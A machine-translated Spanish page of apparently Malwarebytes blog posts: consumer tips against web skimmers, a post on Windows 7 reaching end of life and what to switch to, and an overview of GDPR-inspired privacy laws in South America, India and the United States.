  • No tome sellos de confianza u otros indicadores de confianza al pie de la letra. El hecho de que un sitio muestre un logotipo que dice que es 100% seguro no significa que realmente lo sea.
  • Si no está seguro acerca de un sitio, puede usar ciertas herramientas para escanearlo en busca de malware o para ver si ya está en una lista negra.
  • Los usuarios más avanzados pueden querer examinar el código fuente de un sitio usando las Herramientas para desarrolladores, por ejemplo, que como efecto secundario puede apagar un skimmer que se da cuenta de que está siendo verificado.

Esperamos que la actividad de navegación en la web siga una tendencia al alza en los próximos meses, ya que los hábitos de compra en línea forjados durante esta pandemia continúan mucho más allá. Para obtener más consejos, consulte Consejos importantes para realizar compras seguras en línea después de COVID-19 .

Pormalwarebytes

Windows 7 esta sin soporte: ¿Qué sigue?

Windows 7 es EOL: ¿Qué sigue?

Windows 7 esta sin soporte: ¿Qué sigue?

Al corriente: por 

End-of-life (EOL) es una expresión comúnmente utilizada por los vendedores de software para indicar que un producto o versión de un producto ha llegado al final de su utilidad a los ojos del vendedor. Muchas compañías, incluida Microsoft, anuncian las fechas de EOL para sus productos con mucha anticipación.

Cada producto de Windows tiene un ciclo de vida. El ciclo de vida comienza cuando se lanza un producto y termina cuando ya no es compatible. Conocer las fechas clave en este ciclo de vida lo ayuda a tomar decisiones informadas sobre cuándo actualizar, actualizar o realizar otros cambios en su software.

Windows 7 EOL

Para aquellos que no lo sabían, Windows 7 llegó a EOL el 14 de enero de 2020. Cuando un sistema operativo (SO) de Windows llega al final de su ciclo de vida, ya no recibe actualizaciones de Microsoft.

Eso significa que Microsoft ya no es compatible con los usuarios de Windows 7, y Windows 7 ya no recibirá actualizaciones, aunque se sabe que Microsoft hace excepciones para vulnerabilidades urgentes. Y si bien las organizaciones pueden extender el soporte pagándolo, se aconseja a los usuarios domésticos que pasen a sistemas operativos más modernos.

O como dice Microsoft:

«Ahora es el momento de cambiar a Windows 10. Obtenga características de seguridad sólidas, un rendimiento mejorado y una administración flexible para mantener a sus empleados productivos y seguros».

Y, por supuesto, tienen un punto. Si los cibercriminales descubren una vulnerabilidad en Windows 7, no hay garantía de que Microsoft repare esta vulnerabilidad. Y aunque todavía hay una gran base de usuarios de Windows 7, vale la pena que los ciberdelincuentes usen esa vulnerabilidad y la usen en su beneficio. Tenga en cuenta que la mayoría de los kits de exploits activos en la naturaleza se centran en vulnerabilidades antiguas, que no se corregirán si está utilizando el software EOL.

¿Windows 10 es más seguro?

Si bien la llamada de Microsoft a pasar a Windows 10 hace que parezca muy seguro, ¿cuáles son exactamente estas características de seguridad que Windows 10 tiene sobre Windows 7? Sabemos que será compatible con Microsoft y, por lo tanto, se corregirá cualquier vulnerabilidad conocida. Sus otras características de seguridad son las siguientes:

  • Windows 10 incluye Windows Defender de forma predeterminada, que proporciona un nivel básico de protección antivirus.
  • SmartScreen es un sistema de reputación que intenta bloquear descargas de archivos dañinas y desconocidas.
  • Windows 10 incluye Microsoft Edge en lugar de Internet Explorer, que es el objetivo más frecuente de los exploits.

En el lado negativo, podría argumentar que Windows 10 tiene muchas características nuevas que tienden a presentar nuevos problemas y riesgos. Sin embargo, Windows 10 ha existido desde hace un tiempo, por lo que los peores problemas deberían haberse abordado.

Sin embargo, queremos enfatizar: pasar a un nuevo sistema operativo, aunque es más seguro que quedarse con un sistema heredado, no es un sustituto de una solución de seguridad sólida. Incluso las máquinas con Windows 10 necesitan protección antimalware .

Según un portavoz de nuestro personal de eliminación de malware, la correlación entre el uso del navegador y el malware es en realidad mayor que la que existe entre la versión del sistema operativo y el malware. Significado: El navegador que usa tiene un impacto mucho mayor en la probabilidad de ser infectado que el sistema operativo que usa. Entonces, incluso si cambia a Windows 10 pero sigue usando Google Chrome, aún puede infectarse fácilmente. Ahora que Windows 10 se ha cambiado a Edge, muchos ciberdelincuentes se están centrando en exploits para Google Chrome , uno de los navegadores más populares en la actualidad.

Otros sistemas operativos

Para evitar una posible infección, o porque están buscando un cambio, algunos usuarios de Windows podrían considerar cambiar a sistemas operativos completamente diferentes, como Mac o Linux. Pero la protección integrada en capas con software de seguridad es importante, incluso si decide cambiar.

Por ejemplo, se ha demostrado que el antiguo mito de que las Mac son más seguras que los sistemas Windows. Como puede leer en nuestro Informe de estado de malware de 2020 , las amenazas de Mac aumentaron exponencialmente en comparación con las de las PC con Windows en 2019, con casi el doble de amenazas por punto final de Mac que Windows. Y aunque las Mac no reciben virus, el adware de Mac es más sofisticado y peligroso que el malware tradicional de Mac .

En algunos casos, las personas pueden considerar cambiar a un Chromebook, que sin duda es una opción más barata si ofrece suficientes capacidades para reemplazar su computadora de escritorio o portátil con Windows actual. Pero incluso los Chromebooks pueden, y lo hacen, infectarse .

No esperamos que muchos usuarios cambien a un sistema operativo Linux más duro, ya que pueden esperar una gran curva de aprendizaje (otro concepto erróneo) o su software favorito no está disponible (desafortunadamente, no es un mito). Sin embargo, incluso si lo hacen, los sistemas operativos Linux no están libres de malware. Simplemente son atacados con menos frecuencia porque los cibercriminales entienden que su base de usuarios no es tan grande (y, por lo tanto, su día de pago no es tan grande).

Base de usuarios de Windows 7

Actualmente, más del 23 por ciento de los usuarios de Windows en todo el mundo todavía usan Windows 7, y solo el 69 por ciento ya se ha cambiado a Windows 10. El resto está usando Windows 8 o versiones menos populares de Windows que han sido EOL mucho antes de Windows 7.

Por extraño que parezca, el porcentaje de usuarios de Windows 7 apenas ha disminuido después de alcanzar la fecha de EOL en enero (de aproximadamente 24 por ciento a 23 por ciento). Con esta gran cantidad de sistemas potencialmente no parcheados aún activos en el mercado, cualquier vulnerabilidad explotable resultará en un desastre generalizado.

¿WannaCry habría tenido un impacto tan enorme si Windows XP y Windows Server 2003 hubieran sido abandonados antes de que se extendiera? Nunca sabremos. Lo que sí sabemos es que Windows 8 y 10 no necesitaron ser reparados por la vulnerabilidad que se usó para difundir WannaCry . No estaban contribuyendo al coro de sistemas que intentaban infectar a sus vecinos. Se lanzaron parches de emergencia para varias versiones anteriores de Windows, incluido Windows 7. En ese momento, Windows 7 todavía era compatible.

Pormalwarebytes

GDPR: un impacto en todo el mundo

GDPR: un impacto en todo el mundo

GDPR: un impacto en todo el mundo

Al corriente: por 
Última actualización:

Un poco más de un mes después de que la Unión Europea promulgara el Reglamento General de Protección de Datos (GDPR) para extender los nuevos derechos de privacidad de datos a su gente, el gobernador de California firmó una ley de protección de datos separada y amplia que tomó prestadas varias ideas del GDPR, lo que provocó Soplete en una tendencia legislativa de privacidad de datos que ahora ha abarcado al menos 10 países.

En Chile, los legisladores están actualizando la legislación de décadas para garantizar que sus protecciones de datos constitucionales incluyan los derechos de solicitar, modificar y eliminar datos personales. En Argentina, los legisladores están actualizando un conjunto de protecciones de privacidad de datos que ya le otorgaron al país un estado de «lista blanca», lo que le permite transferir datos de manera más fluida a la Unión Europea. En Brasil, el presidente firmó una ley de protección de datos que entra en vigencia este agosto que crea un marco similar al GDPR, establece reglas para los «controladores» y «propietarios» de datos e instala una autoridad de protección de datos para regular y revisar posibles violaciones.

Más allá de América del Sur, India está considerando una nueva ley que restringiría la forma en que las empresas internacionales usan los datos personales, pero la ley incluye una laguna masiva para las agencias gubernamentales. Canadá aprobó su primera ley nacional de notificación de violación de datos, y en los Estados Unidos, múltiples proyectos de ley estatales y federales han tomado prestados generosamente de las ideas de GDPR para extender los derechos de acceso, eliminación y portabilidad de datos al público.

El RGPD entró en vigencia hace dos años y su impacto es claro: la privacidad de los datos es la ley del país, y muchos países buscan inspiración en el RGPD.

Amy de La Lama, socia de Baker McKenzie que enfoca su práctica legal en la privacidad global, la seguridad de los datos y la ciberseguridad, dijo que el mundo está experimentando cambios importantes en la privacidad de los datos y que GDPR ayudó a estimular muchas de las conversaciones actuales.

«A un alto nivel, hay una gran cantidad de movimiento en el mundo de la privacidad», dijo De La Lama, «y, sin lugar a dudas, el GDPR ha sido un gran impulsor».

Las siguientes leyes y proyectos de ley son una muestra de los muchos esfuerzos globales para llevar la privacidad de los datos a casa. A menudo, las leyes y leyes más nuevas están influenciadas por GDPR, pero varios países que aprobaron leyes de privacidad de datos antes de GDPR todavía están trabajando para actualizar sus propias reglas para integrarse con la UE.

Este es el RGPD en todo el mundo.

Sudamerica

Varios países de América del Sur ya otorgan derechos de protección de datos más fuertes a su público que en los Estados Unidos, y varios consagran el derecho a la protección de datos en sus constituciones.

En 2018, Chile se unió a ese último club, complementando su antiguo derecho constitucional a la privacidad con un nuevo derecho a la protección de datos. La constitución ahora dice:

«La Constitución garantiza a todas las personas: … El respeto y la protección de la vida privada y el honor de la persona y su familia, y, además, la protección de los datos personales. El tratamiento y la protección de estos datos se aplicarán en la forma y condiciones que determine la ley «.

Esa última referencia a «condiciones determinadas por la ley» es muy importante para los derechos reales de protección de datos de los chilenos porque, aunque la Constitución protege los datos, no especifica cómo deben protegerse esos datos.

Piense en ello como la Constitución de los Estados Unidos, que, por ejemplo, protege a las personas de los Estados Unidos contra registros irrazonables. Sin embargo, solo en las últimas décadas, los tribunales y los legisladores han interpretado si las “búsquedas irrazonables” incluyen, por ejemplo, búsquedas de correos electrónicos enviados a través de un proveedor externo o búsquedas de datos históricos de GPS rastreados por un teléfono móvil.

Ahora, Chile está trabajando para determinar qué incluirán realmente sus derechos de protección de datos, con un impulso para derogar y reemplazar una ley de protección de datos de décadas llamada «Ley de Protección de Datos Personales», o Ley N ° 19.628. Los últimos esfuerzos legislativos incluyen un impulso para incluir los derechos para solicitar, modificar y eliminar datos personales, junto con el derecho a retirar el consentimiento de cómo una empresa recopila, almacena, escribe, organiza, extrae, transfiere y transmite datos personales.

La renovación de las protecciones de datos anteriores no es exclusiva de Chile.

Argentina implementó su Ley de Protección de Datos Personales (PDPL) en 2000. Pero esa ley, a diferencia de la de Chile, se inspiró en la Unión Europea mucho antes de la aprobación del GDPR. En cambio, los legisladores argentinos alinearon su legislación con la ley que GDPR derogó y reemplazó , la Directiva de Protección de Datos de 1995.

Esta estrecha relación entre la ley de protección de datos argentina y europea convirtió a Argentina en un lugar cercano para la llamada «lista blanca» del GDPR, una lista de países fuera de la Unión Europea que han sido aprobados para facilitar las transferencias de datos entre países debido a esos países. ‘»Nivel adecuado de protección de datos». Este estado puede resultar vital para innumerables empresas que mueven datos por todo el mundo.

Según la Comisión Europea , los países que actualmente disfrutan de este estado incluyen Andorra, Argentina, Canadá (para organizaciones comerciales), las Islas Feroe, Guernsey, Israel, Isla de Man, Japón, Jersey, Nueva Zelanda, Suiza y Uruguay. También se incluye a los EE. UU., Siempre que las transferencias de datos se realicen bajo el marco limitado del Escudo de Privacidad, un acuerdo que reemplazó al anterior acuerdo de transferencia de datos separado llamado «Puerto Seguro», que el Tribunal de Justicia de la Unión Europea consideró inválido. .

(Privacy Shield también enfrenta desafíos propios , por lo que tal vez Estados Unidos no debería sentirse demasiado cómodo con su estado).

A pesar del estado actual de la lista blanca de Argentina con la Comisión Europea, el país todavía está tratando de actualizar su marco de protección de datos con una nueva legislación.

El nuevo proyecto de ley, Bill No. MEN-2018-147-APN-PTE , se presentó al Congreso de Argentina en septiembre de 2018. Sus cambios propuestos incluyen permitir el procesamiento de datos sensibles con el consentimiento aprobado de una persona, ampliando el alcance territorial de los datos personales. protecciones, creando nuevas reglas sobre cuándo reportar violaciones de datos al regulador de datos del país y aumentando drásticamente las sanciones por violar la ley.

Dentro de América del Sur, todavía hay al menos un país más influenciado por el RGPD.

En agosto de 2018, el entonces presidente de Brasil, Michel Temer, firmó la Ley General de Privacidad de Datos del país («Lei Geral de Proteção de Dados Pessoais» o LGPD). La ley entra en vigencia en agosto de 2020.

Las similitudes con GDPR son muchas, dijo De La Lama.

«Al igual que el RGPD, la nueva ley, cuando entra en vigencia, se aplica extraterritorialmente, contiene requisitos de notificación y consentimiento y transferencia transfronteriza, así como obligaciones con respecto a los derechos de los sujetos de datos y la designación del oficial de protección de datos», dijo de La Lama. «Las cláusulas contractuales estándar de la UE pueden reconocerse bajo la nueva ley, pero este paso aún no se ha dado».

La LGPD define «datos confidenciales» como datos personales que revelan el origen racial o étnico, opiniones políticas, creencias religiosas o filosóficas y afiliación sindical, junto con datos genéticos, datos biométricos utilizados para identificar de forma única a una persona física, información médica y de salud, y los datos se refieren a la vida sexual u orientación sexual de una persona.

Similar al GDPR, el LGPD de Brasil también crea una distinción entre los controladores o propietarios de datos y los procesadores de datos, un marco que se ha implementado rápidamente en las leyes propuestas en todo el mundo, incluido Estados Unidos. La LGPD de Brasil también se aplica más allá de las fronteras del país. La ley se aplica a las empresas y organizaciones que ofrecen bienes o servicios a las personas que viven dentro de Brasil, al igual que la forma en que GDPR se aplica a las empresas que dirigen el marketing hacia las personas que viven dentro de la Unión Europea.

La ley también, después de las enmiendas, incluye la creación de la Autoridad Brasileña de Protección de Datos. Ese organismo tendrá la autoridad exclusiva para emitir regulaciones y sanciones para las organizaciones que violen la ley debido a una violación de datos.

India

A fines de 2019, los legisladores de la India introdujeron una ley de protección de datos dos años después, que incluía pequeñas similitudes con el RGPD de la UE. La Ley de Protección de Datos Personales de 2019, o PDPB, requeriría que las compañías internacionales busquen el consentimiento del público de la India para muchos usos de los datos personales, y otorguen a las personas un nuevo derecho a que se borren sus datos.

Las similitudes se detienen ahí.

Si bien partes de la ley fingen el objetivo principal de GDPR, las protecciones de datos incluidas en realidad sufren de una laguna enorme. Tal como está escrito, aunque las restricciones de datos de la ley se aplican a las agencias gubernamentales, la ley también permite que la autoridad de protección de datos recientemente creada elija cualquier agencia gubernamental que quiera eximir.

La ley permitiría a Nueva Delhi «eximir a cualquier agencia del gobierno de la aplicación de la Ley en interés de la soberanía e integridad de la India, la seguridad del estado, las relaciones amistosas con los estados extranjeros, el orden público», según un borrador preliminar. de la ley obtenida por TechCrunch .

Este lenguaje excepcionalmente amplio es similar a cualquier laguna en los Estados Unidos que se aplica a la «seguridad nacional», y es uno de los que luchan los activistas de derechos digitales en la India.

«Esto es particularmente preocupante en India dado que el gobierno es el mayor recolector de datos», dijo Apar Gupta, director ejecutivo de la Internet Freedom Foundation, al hablar con el New York Times .

Salman Waris, quien dirige la práctica de tecnología en el bufete de abogados de Nueva Delhi TechLegis, también le dijo al New York Times que la nueva ley india pretende proteger al público mientras en realidad está logrando algo más.

«Da la apariencia de ser dueño de sus datos y de tener el derecho de saber cómo se usan, para el individuo», dijo Waris, «pero al mismo tiempo proporciona carta blanca al gobierno».

GDPR en los Estados Unidos

Aunque nos hemos centrado en el impacto de GDPR a escala global, es imposible negar la influencia que se siente en casa en los Estados Unidos.

Si bien los esfuerzos del Congreso para aprobar una ley integral de privacidad de datos se remontan al escándalo de Cambridge Analytica de 2018, algunas de las ideas integradas en la legislación de privacidad de datos más actual se relacionan directamente con GDPR.

Un claro ejemplo es la Ley de Privacidad del Consumidor de California (CCPA), dijo Sarah Bruno, socia de Reed Smith que trabaja en la intersección de la propiedad intelectual, la privacidad y la publicidad. Aunque la ley se firmó menos de un mes después de que GDPR entró en vigencia en la UE, fue redactada con tiempo más que suficiente para pedir prestado a GDPR después de la aprobación anterior de esa ley, en 2016.

«GDPR tuvo un impacto en CCPA», dijo Bruno, «y tiene muchos componentes en CCPA».

CCPA otorga a los californianos los derechos de acceso y eliminación de datos, el derecho de llevar sus datos y portarlos a un proveedor separado, junto con el derecho de saber qué datos se recopilan sobre ellos. Los californianos también disfrutan del derecho explícito de optar por que sus datos no se vendan, lo que no está incluido literalmente en el RGPD, aunque esa ley sí brinda a los residentes protecciones que podrían tener un resultado similar. Y aunque CCPA no otorga derechos a los «interesados», como está escrito en GDPR, tiene un alcance de efecto similar. Gran parte de la ley trata de dar a los consumidores acceso a su propia información.

«Los consumidores pueden escribir a una empresa, similar a GDPR, para averiguar qué información [la empresa] está recopilando sobre ellos, a través de cookies, sobre su historial de compras, lo que están viendo en los sitios web cuando están allí», Bruno dijo. Agregó que CCPA sostiene que «toda esa información, un consumidor de California debería tener acceso a eso, y eso es nuevo en los Estados Unidos, pero similar al GDPR».

Pero California es solo un estado inspirado en GDPR. También está Washington, que, a principios de este año, presentó una versión remodelada de su Ley de Privacidad de Datos.

«También es similar a CCPA», dijo Bruno sobre el proyecto de ley renovado de Washington. «Como lo llamo, CCPA plus».

La Ley de Privacidad de Datos tiene un puntaje cercano al GDPR, ya que toma prestado parte del lenguaje de la ley de la UE sobre «controladores» y «procesadores» de datos, que recibirían nuevas restricciones sobre cómo se recopilan y comparten los datos personales. La ley, al igual que GDPR, también otorgaría a los habitantes de Washington los derechos de acceso, control, eliminación y transferencia de sus datos. Al igual que CCPA, la Ley de privacidad de datos también permitiría a los residentes optar específicamente por la venta de datos.

Aunque el proyecto de ley inicialmente recibió una cálida bienvenida de Microsoft y el Foro del Futuro de la Privacidad , poco después, Electronic Frontier Foundation se opuso a la legislación, calificándola como un » esfuerzo débil y simbólico para controlar el uso indebido desenfrenado de datos personales «.

El proyecto de ley, presentado el 13 de enero de este año, no ha avanzado.

El legado de GDPR: ¿multas o fatiga?

La aprobación de GDPR llegó con una clara señal de advertencia a los posibles infractores: violar la ley y enfrentar multas de hasta el 2 por ciento de los ingresos mundiales. Para un conglomerado de Internet como Alphabet, propietario de Google, dicha acción de cumplimiento significaría pagar más de mil millones de dólares. Lo mismo es cierto para Apple, Facebook, Amazon, Verizon y AT&T, solo por nombrar algunos.

A pesar de tener las herramientas para imponer multas de miles de millones de dólares, las autoridades de toda Europa inicialmente fueron tímidas para usarlas. A principios de enero de 2019, la Comisión Nacional de Protección de Datos de Francia (CNIL) impuso una multa de 50 millones de euros contra Google después de que los investigadores encontraron una «falta de transparencia, información inadecuada y falta de consentimiento válido con respecto a la personalización de anuncios». Fue la pena más grande en ese momento, pero palideció en comparación con lo que GDPR permitió: según los ingresos de Alphabet en 2018, podría haber recibido una multa de aproximadamente € 2,47 mil millones, o $ 2,72 mil millones en dólares de hoy.

Seis meses después, los reguladores se inclinaron más en sus poderes. En julio de 2019, el Comisionado de Información del Reino Unido (que en ese momento todavía era miembro de la Unión Europea) multó a British Airways con 230 millones de dólares debido a una violación de datos anterior que afectó a 500,000 clientes. La multa representó el 1.5 por ciento de los ingresos de la aerolínea en 2018.

Pero las multas regulatorias cuentan solo un lado de la historia de GDPR, porque, como dijo De La Lama, después de la aprobación de la ley, sus clientes le dicen que está fatigada al tratar de cumplir con cada nueva ley.

Los matices entre las leyes de protección de datos de cada país han producido guía tras guía de múltiples firmas de abogados globales, cada una atacando el tema con su propio tomo de información enorme. El propio bufete de abogados de De la Lama, Baker McKenzie, lanzó su guía anual de protección de datos global el año pasado, registrando 886 páginas. Un vistazo rápido revela las diferencias sutiles pero importantes entre las leyes del mundo: países que adoptan un marco que separa las restricciones de datos entre «controladores» y «procesadores», países que protegen a los «consumidores» versus «sujetos de datos», países que requieren violaciones de datos para se informará a las autoridades de protección de datos, a los países que crean autoridades de protección de datos y a los países que difieren exactamente en lo que incluye la información personal.

Cumplir con una ley de protección de datos puede ser bastante difícil, dijo De La Lama, y ​​hay pocas garantías de que el movimiento actual de privacidad de datos esté llegando a su fin.

«Hay dificultades para intentar que una empresa cumpla con una amplia variedad de especificaciones técnicas y de privacidad y encontrar recursos internos para hacerlo es una tarea desalentadora», dijo de la Lama. “Y cuando intentas replicar eso en varias jurisdicciones, vemos que muchas compañías simplemente intentan entender cómo hacerlo, sabiendo que GDPR no es el juego final, sino realmente el comienzo. »